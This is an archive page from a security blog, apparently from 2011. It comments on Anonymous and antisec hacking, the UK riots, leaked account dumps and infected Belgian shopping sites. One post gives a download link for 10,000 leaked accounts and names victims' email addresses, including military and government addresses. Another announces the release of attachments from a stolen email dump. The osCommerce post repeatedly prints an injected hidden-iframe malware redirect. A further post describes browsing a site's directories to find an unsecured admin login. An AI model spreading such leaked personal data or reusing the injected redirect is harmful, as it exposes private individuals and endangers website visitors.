security - Page 137

  • san Francisco railway system and Anonymous : how a local incident becomes internetglobal

    the incident : two armed cops from the railway system in san francisco use their guns during an incident and two people are dead

    the eye-catching : the san francisco railway system decides to block cellphones in some stations to prevent protest actions from self-organizing and anticipating the movements and reactions from their own police force (democratic control ?)

    the internet blackslash : Anonymous accepts that this is a cause worthy of some reaction - even if it is only to show that you don't mess like that with the 'right to communicate' and calls for online and offline actions

    the eye-catching : the san francisco railwy system decide to close down certain stations of fear of the protests and decides to go publicly against the protestors

    the internet blackslash : the website got hacked and a database of 2000 persons (workers and contacts) got published and the online reputations is tarnished

    the protests itself got more press than protestors wearing the Anonymous masks but that is an success an sich

    it is a perfect example how overreaction leads to a global protest that leads to overreaction that leads to a problem that is completely out of control public-relationwise and is an IT-fiasco

    or how an idea that "has been read somewhere" can lead to such results if it ain't researched, prepared and analyzed with a very critical point of view instead of just rushing into it

    sometimes the online world seems like a village and a village can become the center of an important part of the global world

  • #ukriots - what is the impact of the #watercannon

    according to the Belgian minister of Interior a watercannon values 100 policemen - this means if you use a watercannon you need 100 less policemen at that particular place. If you take into account that at most place the number of attackers were between 20 and 200 and that the police needed a one on one presence, than you can see why watercannons would have made a significant difference

    secondly in Belgium we use them also to 'hold' positions combined with a kind of barbed wire - these positions hardly get broken through (with very few police present at that position)

    there are permanently 2 watercannons at standby at 2 different locations in Brussels - ready to intervene at notice (like the firebrigade)

    we also use a horsebrigade - of which there are also some on permanent standby in Brussels

    it also seems the UK has no specialised seperate riotbrigade like the rest of Europe has, which may explain the lack of training, material and riot-control-strategy

    riot control is a specific kind of crowdcontrol and you really have to be trained for it and have the necessary material and strategy, which is why in Europe the policeforces have seperate units who deal with the frontline battle when riots occur

    take that into consideration for the Olympics

    not someone from LA who lives in an environment with national guard, guns and gangs

    and before looking at what the french are saying, look at what the permanent crime and burnt-car statistics say weekend after weekend for their hot-spots (on which they have given up in fact)

    ps also look at where the riots took place and where the Olympic infrastructure is :)

  • teampoison and Anonymous working together ?

    Anonymous is a movement that consists of different clusters and groups that sometimes work together, sometimes battle against others, sometimes exists or dissolves or launch campaigns together or only

    when lulzsec started his antisec campaign - that from sabu seems now to have been taken over by various other small teams who publish daily or weekly a selection of dumps of databases or just the links where to send your sql-injector-database-extractor 

    another thing that makes it even more difficult to follow the flow of incoming datadumps and alert the cert that something is wrong (or maybe wrong) is that pastebin.com, the main anonymous site where you can copy paste anything you want, is now more and more controlling and deleting database dumps and hackguides for certain sites (pastebin ID unknown is mentioned)

    but back to the story

    when Lulzsec became a part of Anonymous after saying first that they were a bit bored with all these political discussions and old-guard vs newcomers back and forth exchanges teamposion and a few other hackers declared war on them and said they were going to expose them and hack their sites and all that kind of stuff. It is unclear yet if their information has lead the police to the arrests and it is unclear yet if the lulzsec operation has been broken beyond reparation - but for the moment we are seeing a lot less headline grabbing stuff from lulzsec. but you shouldn't underestimate them. They are sitting on gigabytes of stuff that isn't released yet - unless when all copies have been found by the police. 

    teampoison made itself not really popular in the Anonymous community with this action and the exchanges online and the anti-teampoison actions and dox were not really friendly

    but Anonymous always surprises us and when analyzers think that the movement can be predicted and analyzed among the lines of organizational science and analytics they will make many mistakes if they persist

    I more and more see it as a flashmob - something that comes together at a certain moment for a while to do certain things that may or may not be planned and of which the beginning is planned but all the rest depends of the actions of every active actor in the campaign and that after a while goes slowly or quickly away and turns it attention to other goals and movements and tactis

    you can't say they have a strategy - they have tactics - and you can't say they have an ideology - they have some kind of vague 'be all one against the injustice of it all and we all come together with specific demands or just revenge for the injustice done' - and in that they ressemble revolutions and riots when they start (these don't have leaders in the beginning it is only later in the movement that leaders and strategies appear)

    the disadvantage is that they can't hold on long to a tactic that need a prolonged time of action to be successful - take the antipaypal action. They were successfull the first week but now the action seems to be widening down and attention has gone to other actions. This means for firms and organisations that come under attack from the Anonymous movement have to mobilize all necessary resources instantly to be able to limit the damage. As it becomes clear that such a campaign will only go on for a few days or a few weeks max the budgetary impact to throw all these resources in the defense of the networks and the continuity of the online resources isn't that enormous. It also makes room for a new market in which a consortium of services (business continuity, deep defense, customer control, logging, crisis communication,...) can step in instantly and take over the command and control of a network and the online resources to protect it and keep it going while the Anonymous campaign is launching or in full swing. We can't demand from all the online business to re-invest the millions necessary to make their online presence totally imune to such a flash mob attacking all possible inroads in a network or ways to disturb the functioning of the service. But you can expect that they will activate stand-by contracts when they come under attack.

    now back to the flash-action-mob

    well this is maybe another proof that anonymous is in fact a flash mob. Because for teampoison and Anonymous to come together for a global action against the music companies (Anonymous birth is in the actions from 4chan against the music companies and the firms that prosecute the P2P users) it means that all is forgotten

    and that is like in riots and revolutions, you are sometimes enemies and sometimes comrades and sometimes it just depends on the fact if you find a common enemy or not

    for Anonymous there are enough common enemies around to regroup its different factions even if they were battling each other online for life and death

    however one should note that the dumping of all that accountdata of innocent users is not supported by everyone in the Anonymous community

    but you can't predict what it means, you can't predict Anonymous, you can only follow and try to follow it wisely and try to see the facts through the hype and sensation and try to give practical advice to those who are or will be under attack

  • the russian fastflux botnets are back again

    this is what shows the analysis from arbor networks

    at the domainnames of the botnetcontrollers you see two important things

    * they have an .ru domainextension (or .com)

    * they have mostly a pharmaceutical name in the domainname

    blocking .ru is something quite cheap if you can afford it

    or you can whitelist it for specific people if only a few send mails or visit websites with an .ru domain

  • 10.000 accounts leaked from hacked unlockit.com

    you can download it from here

    Upgrade to a FileSonic Premium account and download at incredible speed! And Make Money Sharing your files

     

    http://www.filesonic.com/file/1654677301

    it has been sent to the cert.be

    there are belgian adresses in it

    if you have no .be emailaddress than you may check it for yourself

    this is the biggest unlocking service for mobiles and smartphones

    it also means that everyone on that list has a vulnerable phone because they can't install the latest security updates because these won't be able because that will re-lock their phones

    this means that some of these phones are vulnerable for the latest attacks

    and a few have even used their professional emailaddresses like so it will even be easier to find their mobiles

    (who said that publishing your mobile number is without risks ?)

    denver.fritz@capetown.gov.co.za
    cameron.roy.d@edumail.vic.gov.au
    Dean@tebabank.com
    bankpersonnel@sbcglobal.net

    anson.d.sitton@us.army.mil

    berryra@lpd20.navy.mil

    and so on, you will get the picture, there are alos emailaddresses from banks and corporations

  • what emailsecurity professionals could learn from the us sheriffs emailhack

    some weeks ago lulzsec declared it was dumping 7 giga of emails and files from a mailserver from an organisation that organised services for sheriffs in the Usa

    A big trunk of that was a download from the mailserver

    after analyzing this I kept thinking about the new demands these attacks pose for emailsecurityprofessionals

    1. Not every online mailbox is worth something

    You will see that many online mailboxes have been emptied and have no interest whatsoever. some mailboxes have folders that seem empty and only trash and non-confidential stuff that stayed online.

    What it means is that in future online mailboxes if you don't want mail to stay on the personal computers it still have to leave the mailserver and go to another server that can only be accessed from the inside or by a securitychannel like VPN (and not the servers itself).

    It also means that one should have a big discussion about the question if you don't need an emaildestroypolicy instead of a conservationpolicy. If you say that all that has not been saved on internal secure servers will be destroyed, than you will always have a cleaner webmailbox.

    A side thought is about the attachments which are sometimes confidential internal (personnel) files. It should be possible to keep only the mails online and have the attachments on another server (which would need another authentification)

    2. Not all mailboxes are clean

    We have seen mailboxes with viruses (yes there are virusalerts for this dump) and personal stuff and some questionable stuff that seems to be private. It means that if you have a mailserver your securitypolicy should be implemented across the board and not only for some specific mailboxes.

    3. No passwords or encryption on files

    and so you could read nearly everything and open nearly every file

    putting the file in a zipfile with a password isn't too hard to ask

    and for the securityresearchers

    we will be releasing this weekend a release of the dump that has only the attachments and pics and some other stuff

    by this release it is clear that when a mailbox get hacked so many things can get stolen that a securityprofessional doeosn't know where to start

    * personnel files

    * accounts and forms

    * pics of badges and icons

    * personal files or about other persons

    for a phisher this is a goldmine

  • ukriots : you are convicted and your conviction is tweeted for all to see

    so the police have arrested more than a thousand people - some say 1200 for the whole of the UK - and even if there are no riots like we have seen on tv the first days of the week every night a number of people get arrested (my tweetlist about the ukriots has all the official twitterfeeds from the uk policeforces where riots are/were happening - so they mention all the different arrests and incidents). The incidents are relatively minor  and maybe the number of arrests is normal - but now the question is how to pull this state of police presence and calm over the weekend (always a dangerous moment).

    like in the Usa the uk has now organized 24hours courts were magistrates based on the evidence between them hands out convictions to those charged (yes you read it right, the courts are sitting 24h a day for the moments and people work in shifts).

    the courts have even accepted that the convictions are being sent in real-time on the web by twitter

    you can follow this process here (not sure if there are other ones)

    https://twitter.com/#!/AdamMcCleanITV

    https://twitter.com/#!/robsmithitv

    you should combine this with the fact that certain police forces tweet the name and charge of everyone they charge with a criminal act (sometimes it may be just insults and foul behavior other times it is robbing and rioting and violence)

    https://twitter.com/#!/list/mailforlen/ukriots

  • only drastic measures brought the UK back to 'normal'

    Upgrade to a FileSonic Premium account and download at incredible speed! And Make Money Sharing your files

    the news wasn't good during the day as the UK prepared yesterday for another crucial night

    the racist English Defence League has called upon her supporters to man the streets and defend the neighborhoods. As some of them have shown little consideration for the law and a love for violence first, discussions afterwards, this may lead to problems.

    some streets or communities are manning their own vigilantes - but how long can you keep up 20h working days (because you still have to work during the day while you are up in the street untill very late) - as mixed as the rioters are - as mixed are the communities defending their properties against the looters

    yesterday - this night three people died when defending property or being on the street guarding it - it is luckily enough also that some are 'immigrants' making it difficult to make a stereotype EDL would love

    in some cities the football matches are going ahead even if they are considering local curfews around shopping areas (and the others)

    according to a yougov opinion poll the people want more police with battons and plastic buttons and tear gas and the works and would even support military in a supportive role but they will believe that most of the rioteers won't be convicted and they blame the government and the mayor (oh yes and I don't think the police forces on the mainland would be willing to lend now their watercannons being unsure of what would happen between now and monday depending on the UK situation)

    the best joke seen

    http://photoshoplooter.tumblr.com/

    but aside from this best joke ever seen the last days, you can ask yourself how long you can live in this normality. Roads to the city centers over the UK were closed between the afternoon and midnight, public transport was cancelled or diverted, shops closed at 16h and people went and stayed mostly home in certain otherwise lively city centers while thousands of police were massing on the street, arresting anyone who even looked like ready to stirr any trouble, it was like an unofficial curfew (if you don't want to make or get in trouble, stay home, the fact that you are on the street, makes you suspicious)

    the most important is that the circle - the dynamic - of violence has been broken and that if that situation can be maintained untill after the weekend they can maybe go back to some kind of normality even if some things in some neighborhoods will never be the same for years to come

    this promises for the Olympics

  • from burning London to the UK

    While the police have been massing to London, the cities that have sent their best police troops to the capital - and stopped it from burning - have given the possibility to gangs of estate youth (kind of innercities of doom and gloom with generational poor) the room and possibility to attack, loot and move around several cities.

    so the police won London but has lost a lot of other cities and killed the idea that it was only a major problem of London (which is 11 million people by the way) there were also 3 people killed this night while standing guard before their house or shop (and being overrun by a car and things like that)

    and it may be that in the coming week - and probably in the weekend - problems may also arise in cities on the continent (in fact this is what the police forces and media on the continent are preparing for)

    the army has units on standby because it is clear that the UK police can hold London but there aren't enough police around to hold the UK once everywhere the estate kids decide in groups between 20 and 100 to attack the stores they don't have money for (after been bombarded daily with youth advertising that they need those things to be someone)

    it is not clear what the PM will decide next. He doesn't have many options with the weekend before him. He can't get police out of London, he can't send more police to London and he can't get the watercannons out of Northern Ireland either (except if they interrupt for the time being the marching season).

    France declared local states of emergency when a wave of innercity violence spread over France like wildfire and police was overstretched. They didn't call in the army but the police and the mayors had the possibility to decide for local curfews, give the police wide powers to arrest or apprehend and interdict weapons and masks and things like that. If you don't read about riots in the innercities of France it is not because the level of violence in these innercities or estates has disappeared, it is only not on the political and media agenda anymore. Every night there are numerous cars going up in flames in those cities and an enormous list of incidents and crime and except from the televised big police operations the state (and the commercial investors) have mostly retreated from these areas (no postal office, no decent school, no late public transport and so on).

  • 10 practical riot and disaster tips for small UK business and shops

    this is what I have said to family in the UK having some small business

    1. Take all the important documents out of the office and in a safe place that won't be looted or burnt (or a copy or scan it but you will have other things to do) and Migrate all your important electronic files on all your electronic stuff (computer, phone, laptop) to central servers hosted somewhere else

    2. Practical and Physical safety and security is enormous important. If you thought of changing locks on the door and getting thicker glass or things to protect your windows (or your shop) you do it now. If you don't have that  money or time, than you will have to empty your shop-store of everything very valuable (limit payments in cash, prefer creditcards (give a reduction if they do)). Apple emptied its own store before closing down. It went in vans to a safe area. For shops like Apple you can re-organize your business so that you don't have much stock anymore and the sold article is sent by a deliveryservice to the client the same day from that safe location. I believe strongly in click-and-mortar (and this is one reason why)

    3. Everyone should have phone numbers from everyone and everyone should always be accounted for and everyone should know who to call when something happens. The person responsable for the security should have the phone numbers of local police and emergency services. If your business is great or important, you should have a very short talk or email with the local police to inform them who to contact if their intelligence tells them there will be trouble or a curfew will be installed in your area. If you have a few pounds, you buy a second phone which is only used during these emergencies. This phone should only used for these purposes so keep it open (battery is important) and accessable (short conversations) in emergencies. Minutes can be very important during riots. Do not buy blackberry as second emergency phone as they may have to interrpupt service during riots. Also have a contract with another major mobile provider than you use for the other phone.

    4. Organize an evacuation exercise but be sure that you know exactly how many minutes it will take to have everybody safe not out of the building but out of the trouble are. It is information that the police officer will know when he 'has to hold the street' but knows that they will have 'to retreat'. If you say 'I need 10 minutes to get everybody out and in their cars and the cars in a column to drive away' he will probably try to hold on another 10 minutes, if you have no idea, he won't have any either. 

    5. If you leave by car - several cars form a column - you must remember that you may never stop (and keep all doors closed) whatever the circumstances. Do not stop (except if you are going to kill someone on the ground but than you go backyards or aside) or if your car is really on fire. Do not stop because windows are crashing or people are asking you to or sitting or jumping ON it. Have in the column claxon signals for (forwards, backwards, left, right, help)

    6. Never do all these things alone and stay together untill you are out of the trouble area

    7. Always stay calm and alert and continue with leaving the area - bystanders are always hindering police operations

    8. Inform parents, partners and family that you are allright and going to a safe place

    9. Make arrangements for the next day with staff depending on the situation

    10. If you have been looted or the office is burnt out, you will have to look for another office and eventually computers and re-organize the work a bit (but you have your documents and your electronic files out of harms way). There are systems where you can work online from your homes (vpn - shared offices online or sometimes even email and google documents may be enough, eventually coupled with a blog and twitter to keep people informed of things - do not start setting up a website, you won't have time.

    This way you can phone or mail your clients and ask for a week to re-start if necessary and say that you were prepared and that everything goes as planned. THis will make a lasting impression.

    You can defend your shop or house, ok, but last night 3 people were killed by doing that. Was it worth it ? It is better to defend a street or neighborhood but that you have to coordinate with the police (and not use it as an excuse to start drinking and having trouble among yourselves)

  • updated news about the uk ongoing riots (manchester and birmingham)

    * blackberry may interrupt service tonight in London

    * you can follow the latest controlled news on twitter

    twitter.com/mailforlen

    or the list with other good sources (being updated)

    https://twitter.com/#!/mailforlen/ukriots

    I have added police tweets and official media - also from manchester and birmingham

    official media is making less reports and less live reporting

    yesterday it was like - come on out the police is overwhelmed see for yourself

    today reports of arrests and police operations during the day

    more news articles and online resources are here

    http://www.diigo.com/list/mailforlen/international

    the one thing I have been twittering about is the following : watercannons

    here is the summary

    The UK has 6 watercannons in total (yes six) while it is being used very often and effectively on the mainland Europe and .... in Northern Ireland where those 6 watercannons are (but have to stay because it is the marching season). The police wanted to use them anyhow but the Home secretary was against it because it is 'uncivilised" (which means that the people on the mainland and in Northern Ireland are barbarians ?).

    You wouldn't see 20 policemen running away from 50 rioters if they were supported by a watercannon

    So I would say, support the British, send your watercannons

    for the techies

    oh yes black berry is a better organizer of illegal acts than twitter because it is encrypted and messages are only for the people who are your friends (and that is not the police for rioters) but blackberry may consider stopping the service tonight and will cooperate with the police

    and twitter is exploding in the uk now

    the police services are also using it (how do yours)

  • london : the night the police must win

    After three nights of freerunning rioting and seeing videos of overwhelmed and selfprotective police without the mechanical and operational means to intervene - making people call for the army

    this is the night that the policeforces have to proof to the londoners and the world (as Olympic city) that they can control this

    of course this will have an enormous impact on the necessary investments in security and crowd control for the Olympics at a time when the UK was preparing itself to let thousands of police officers go - and having much too few of them in case of many disperate disturbances

    tonight the police must win if they don't want the army on the street in certain cities

    it is clear however - coming from belgium - that the police doesn't have the same means they have in Northern Ireland because that would be too 'uncivilized' like watercannons or other specialized cars (like you see on tv when they rioting again in Northern Ireland)

    If you don't want to invest in the manpower to control crowds you will have to invest more in intelligence and 'mechanics' and tactics to compensate.

    If you have been in London you know how poor some areas are (and the poorest we didn't visit)

    twitter.com/mailforlen

  • new antisec hackteam building (dearing and without fear)

    https://twitter.com/#!/TehWongZ

    when you follow the twitter and the groups over a period of time, you see things happening before your eyes

    first he came with a few vulnerability analysis of some big sites like bbc and so on

    now he has a team with other antisec twitters who are joining

    he doesn't always dump the data, sometimes he just exposes the big securityholes

    (and sometimes you think don't those very big sites do those controls regurarly or automaticcally (it isn't even expensive :))

    I think - up till the moment he is arrested or get freightened - will do some stuff - horrific for some and fantastic for others

    but up untill now he is really enjoying this stuff and the attention

    which will mean he is not ready to stop yet

    it is as if he knows he can be arrested and that if that is so, than let that be the case, but why not have some fun in between

  • belgian oscommerce websites still infected with even more redirectpages

    we are talking about oscommerce sites who are selling stuff online and sometimes using creditcards, your paypal accounts or other personal details (sometimes many times just in http by the way)

    since the alert was launched about an injection attack on oscommerce (open source shoppingsoftware) you could hope that the administrators would take at least notice and fix the stuff. This is not about blogs and pix and vids, but about money and money makes the world go around (especially today)

    on the contrary the attacks (in which visitors to these sites are redirected to malware and other sites) have been more than doubling and well with one particular injected redirection script

    "http://willysy.com/images/banners/" site:be

    or it is that the script is infecting an increasing number of pages on the website (for example because they are added)

    we are now at nearly 26.000 pages at the following sites

      1. Ascolia<iframe src='http://willysy.com/images/banners/' style ...

        ascolia.be/customer_testimonials.php - Cached
        Your trolleys fit perfectly well in our hotel. The wide choice of models and dimensions, as well as the personalisation by colours and logo offer the ..
      2. www.savon-de-provence.be/information.php?info_id=8...en - Cached
        We bring you a comprehensive range of scented soaps plus a wide variety of natural products for the bath and everyday wellbeing.
      3. - Legends Bike<iframe src='http://willysy.com/images/banners ...

        www.legendsbike.be/index.php?cPath=19_52 - Cached
        430001 - Glove Box Rubber Black Rally 10 430001 - Glove Box Rubber Black ...
      4. Legends Bike<iframe src='http://willysy.com/images/banners/' style ...

        www.legendsbike.be/product_info.php?products_id=1701...en - Cached
        30 Oct 2005 – As a Piaggio distributor for the frenchspeaking Belgian ...
      5. Portostore

        www.portohuis.be/catalog/ - Cached
        18 sept 2008 – Welkom Bezoeker ! Wilt u inloggen? Of wilt u zich als ...
      6. Shop4Jewels<iframe src='http://willysy.com/images/banners/' style ...

        bkitsch.be/information.php?info_id=4 - Cached
        Tell someone you know about this product. Mens Clothing Womans Clothing ...
      7. DCV Motors<iframe src='http://willysy.com/images/banners/' style ...

        www.dcvmotors.be/historiek.php
        This site may harm your computer.
        DCV MOTORS is opgericht in 1995 met als toenmalige zaakvoerders De Bruyne ...
         
      8. ACS INFORMATIQUE<iframe src='http://willysy.com/images/banners ...

        acsonline.be/acscommerce/catalog/contact_us.php - Cached
        Recherche rapide. Recherche avancée. Fabricants. Choisissez, 2POWER, 3COM ...
         
      9. CIS Computers<iframe src='http://willysy.com/images/banners ...

        www.ciscomputers.be/Shop/index.php?cPath=42 - Cached
        Products 1 - 7 of 7 – Product Name+ · Price, Buy Now. ASRock ALIVE NF6G-VSTA, 55.00EUR. Buy Now · ASROCK CONROE1333-D667 R3.0 S775, 42.00EUR ...
      10. Stickermaker.be<iframe src='http://willysy.com/images/banners ...

        www.stickermaker.be/index.php?cPath=0_15_35&osCsid... - Cached
        Artikel 1 tot en met 4 (van 13 artikel), Pagina(s) gevonden: 1 2 3 4 ...
         
      11. OBAMA SHOP<iframe src='http://willysy.com/images/banners/' style ...

        cece.be/web/modules/shop/product_info.php?products_id=19 - Cached
        22 Apr 2010 – OBAMA SHOP<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe> ...
      12. Volvo onderdelen<iframe src='http://willysy.com/images/banners ...

        volvoparts.be/142144/Rem/Bout-handremkabel-bev-955637.../en/ - Cached
        For volvo Amazon, Amazon Combi, 164, 140, 145, 240, 260,. This product was ...
      13. Lemachemie<iframe src='http://willysy.com/images/banners/' style ...

        www.lemachemie.be/catalogus/site/index.php?manufacturers... - Cached
        Artikelnaam+ · Artikelmodel · Fabrikant · DISPENSER HANDDOEKJES ZZ, LO053 ...
      14. Organicwine<iframe src='http://willysy.com/images/banners/' style ...

        www.organicwine.be/portugal-c-35.html - Cached
        Casal Dos Jordões Douro DOC Druiven: Touriga Franca, Touriga Nacional ...
         
      15. Laferla Boutique<iframe src='http://willysy.com/images/banners ...

        www.laferla.be/index.php?manufacturers_id=3&osCsid... - Cached
        Laferla Boutique<iframe src='http://willysy.com/images, Mon compte · Voir panier · Commander · Accueil » Catalogue », Mon compte | Voir panier | Commander ...
      16. Sobelco, Electrical Solutions, Domotica, LED-systems<iframe src ...

        www.sobelcobvba.be/elektronica-divers-pm-12.html?CDpath=12 - Cached
        ELECTRICAL. SOLUTIONS. DOMOTICA. Winkelwagen: 0 Artikelen Login · Home ...
         
      17. PAPERNET<iframe src='http://willysy.com/images/banners/' style ...

        www.papernet.be/contact_us.php - Cached
        Sièges sociaux de corporation: Votre nom commercial adresse de rue d/affaires. Votre ville daffaires et code postal. Pays d/affaires ..
      18. www.laptop-discount.be/product_info.php/products_id/58 - Cached
      19. 16 mei 2011 – Intel® Core™ i7-2630QM 16Gb DDR3-1333. 120Gb SSD OCZ Vertex3 750Gb HD 7200rpm. ATI Radeon™ 6970 2GB DDR5 17" Full-HD ...
      20. Laptop Discount<iframe src='http://willysy.com/images/banners ...

        www.laptop-discount.be/shopping_cart.php - Cached
        Inhoud van de winkelwagen, Inhoud van de winkelwagen. Uw winkelwagen is leeg ...
         
      21. WINTECH.BE | Votre spécialiste en nouvelles technologies<iframe ...

        www.wintech.be/oscommerce/products_new.php - Cached
        Sony PSP Go Date d'ajout : 07/10/2009. Fabricant : Prix : 220.00EUR, Ajouter au panier · Lampe Autonome Date d'ajout : 03/10/2009. Fabricant : Wintech ...
      22. SynTsize pump - Fitstar

        www.fitstar.be/product_info.php?products_id=161
        This site may harm your computer.
        23 okt 2010 – Fitstar<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe> ...
      23. Sun-power.be<iframe src='http://willysy.com/images/banners/' style ..

        www.sun-power.be/webshop/ - Cached
        X-press 120W/2m. 11.99. X-press 100W. 8.60. X-tend 0.3-25watt. 6.99. Website | Uw klantgegevens | Winkelwagen | Afrekenen | Copyright © 2011 Sun-power.be ..
      24. Tazmas,Armani watches,Watches Jewellery Specialist,Guess ...

        Armani watches, Armani Jewellery, Armani Jewelry ,ring,Armani rings, Armani bracelet, Armani necklace, Emporio Armani, ,Fossil Watches, Burberry Watches ...
      25. CRE Loaded 6 - CRE Loaded Store<iframe src='http://willysy.com ...

        osCommerce : What's New Here? - Hardware Software DVD Movies What's New Here? - Hardware Software DVD Movies.
      26. ABAO

        www.abaobxl.be/catalog/index.php - Cached

    Upgrade to a FileSonic Premium account and download at incredible speed! And Make Money Sharing your files

  • canvas the cleanup operation and the importance of directory surfing

    so it was cleant by 16u57

    than the page-updater flickered and showed this

    Index of -wp-content-themes-canvasvideo2_1312815559512.png

    it is small but you see a series of files - which is an index of files or a directory

    directory surfing is the third most popular attack nowadays

    called to the cert

    a few minutes later it was corrected

    I only saw white pages

    but didn't I say that directory surfing was the third most popular attack nowadays

    so I will start by elimintating slashes/directories from here

    http://video.canvas.be/wp-content/themes/canvasvideo2/index.php

    untill I arrive at this

    http://video.canvas.be/wp-content/

    an administrator login page with only one password and ...... no https certificate

    all clear text

    this is why directory surfing is so popular

    you are always amazed by what you find :)

  • Joop.nl hacked twice in two days and lost twice 6000 accounts

    sometimes you don't believe what you read

    since years we are talking about sql injection

    it is in all the programmers books

    and than an important dutch site from a dutch television station got hacked twice in a few days

    and loses her 6000 accounts on the internet

    and has to send them all a letter

    they have upgraded the encryption and closed the sql injection holes

    and they are lucky the accounts weren't already published online yet (probably dutch hackers or cybercrime)

    the reason why is that I think that this blog-discussionboard is very controversial and people discuss politics and society in very harsch and disrespectful terms (nearly hateful)

    so it is not luck that is responsable for the attacks, but the way you conduct the discussions on your site

    if you want to sit in the heat of the kitchen you should be knowledgeable enough not to get burnt

  • studio 100 private data hacked and leaked : you may be next

    studio100 is one of the biggest mediacompanies around in Belgium for the moment and it had on its website all the personal information of a whole lot of celebrities (who may now change address and so on because all these fans will be phoning them ......)

    the hack was the work from a dutch hacker Pompiedompiedom but that doesn't seem to be a very well underground name as far as I can see

    he showed it to webwereld.nl because he was afraid that the company would go after him - which would be easy based on the existing cybercrimelaw in Belgium (and why you shouldn't do that in Belgium as a Belgian - untill now all important hacks by Belgians against Belgian sites resulted in arrests, indictements and sometimes a trial (that can take years before it begins)

    it was a stupid sql injection that gave access to several databases with information that probably didn't have to be on that webserver (never heard of a VPN and an extranet and double authentification ?)

    even more astonishing is the reaction of the spokesperson : we will do some resarch and if something needs to be done, we will do it.

    hu, if someone with a simple sql injection can show a journalist all the private addresses of artists, journalists and politicians a company works with than you have to do something and immediately (throw the databases offline for starters)

    the penetrationtest failed big time on your account

    lesson : in these times you keep as little private information as needed outside your network and you host whatever is production server or private information on your intranet (defended by a VPN, encryption and double authentification ideally).

  • canvas and abelag.be had their wordpress hacked

    http://video.canvas.be/wp-content/themes/canvasvideo2/index.php

    http://www.abelag.be/wp-content/themes/PrestigeDarkVol1/index.php

    and they didn't see it happening nor that it was there

    wordpress zero day from last week

    gives you the possibility to insert anything (porn, virusses, webshells etc....)

    iskorpitx_1312807574348.png

    monitoring is for dummies

  • belgian cert about the antisec campaign in Belgium (3500 victims)

    we have been forwarding information to the cert about leaked belgian adresses, accounts and sites

    the belgian cert now says the following

    around 3500 belgian accounts or accounts from belgians were published the last months

    they note that only 100 persons reacted and that most didn't understand or even didn't appreciate what they did

    http://datanews.rnews.be

    luckily we work for the greater good and can make an abstract about that

    it also means that without reglementations and controls you can't work efficiently

     

    Upgrade to a FileSonic Premium account and download at incredible speed! And Make Money Sharing your files

  • netanalyzr : block it from your networks

    the reasons are in the posts under it

    the links to the servers are all put in here

    http://www.scribd.com/doc/61674312/netalyzr-icsi-berkeley-edu-1

    after some discussions on their mailinglist after mailing them

    * they still think that it is about links to the reports in private forums and not all the reports that are on their own server

    * they don't understand how dangerous that information can be and why networks may not like that information being on the internet

    * a lot of discussion and remarks that are no real answers

    * only a very small change, being the robot.txt

     

    so does that inspire trust

    If I was a network or a security tool I would block them for now

    and no, I don't have time for apple or linux is better type discussions